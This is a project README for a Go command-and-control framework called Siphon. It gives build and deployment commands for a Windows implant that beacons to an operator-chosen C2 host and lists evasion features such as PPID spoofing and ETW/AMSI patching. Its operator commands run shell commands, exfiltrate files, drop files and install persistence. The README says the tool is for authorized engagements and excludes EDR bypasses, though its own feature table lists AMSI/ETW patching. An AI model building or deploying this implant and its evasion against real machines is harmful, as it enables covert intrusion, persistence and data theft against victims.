Lightweight Go C2 — ECDH P-256 forward secrecy, AES-256-GCM encryption, uTLS Chrome fingerprinting. Production ready with zero config files.
The implant doesn't store secrets to disk — because that's where EDR and forensics teams always look first.
Modern C2 frameworks focus on feature count over operational security. Siphon prioritizes the inverse: per-session forward secrecy and zero-configuration deployment. No config files touch disk, no plaintext credentials are stored, and every beacon uses ephemeral encryption keys.
Built for environments where every file write is logged and every network connection is inspected. The implant operates entirely from memory with server parameters embedded at compile time.
| KEY | VALUE |
|---|---|
| CRYPTO | ECDH P-256 · HKDF-SHA256 · AES-256-GCM · HMAC-SHA256 — ephemeral keys only |
| TRANSPORT | HTTPS beacon · uTLS Chrome fingerprinting · cookie-based payloads |
| CORE | Lightweight Go implant ~2 MB — zero runtime dependencies |
| EVASION | PPID spoofing · ETW/AMSI patching · CREATE_NO_WINDOW · stripped binaries |
| STACK | Go 1.24+ · Make · Cross-compilation Linux→Windows |
Full build instructions in Makefile. Operator workflow via interactive CLI.
```bash
# Prereqs: Go 1.24+, Make
git clone https://github.com/Real-Fruit-Snacks/Siphon.git
cd Siphon
make setup && make server

# Build implant with embedded config
make implant SERVER_PK=<hex> C2_HOST=https://your-c2:443 SLEEP_SEC=10

# Start the server
./build/siphon-server -listen :443 -cert server/certs/server.crt -key server/certs/server.key -auth secret-token
```

OPERATOR COMMANDS

| COMMAND | DESCRIPTION |
|---|---|
| `implants` | List checked-in implants |
| `interact <prefix>` | Select implant by prefix match |
| `cmd <command>` | Execute shell command |
| `upload <local> <remote>` | Exfiltrate file from implant |
| `download <remote> <local>` | Drop file to implant |
| `sleep <seconds>` | Change beacon interval |
| `persist <method>` | Install persistence (registry/schtask/startup) |
| `selfdestruct` | Remove implant and clean up |

BUILD TARGETS

| TARGET | DESCRIPTION |
|---|---|
| `make setup` | Generate ECDH keypair + TLS certificate |
| `make server` | Build C2 server (Linux amd64, stripped) |
| `make implant` | Build implant (Windows amd64, cross-compiled) |
| `make implant-linux` | Build implant (Linux amd64, for testing) |
| `make clean` | Remove build artifacts and generated keys |

ARCHITECTURE

| PATH | CONTENTS |
|---|---|
| `shared/types.go` | Protocol types: Beacon, Task, TaskResult, Envelope |
| `server/` | ECDH crypto · HTTP handlers · operator CLI |
| `implant/` | Transport · tasks · Windows evasion · patches |

All configuration bakes at compile time via ldflags — no environment lookups, no secrets on disk.
Built for engagements that are scoped, written, and signed. Read the threat model before the install instructions. Vulnerabilities go through private security advisories, never public issues.
Siphon does not include credential harvesting, lateral movement, privilege escalation, EDR bypasses, log destruction, or payload generation — and never will.
License: MIT · Part of Real-Fruit-Snacks — building offensive security tools, one wave at a time.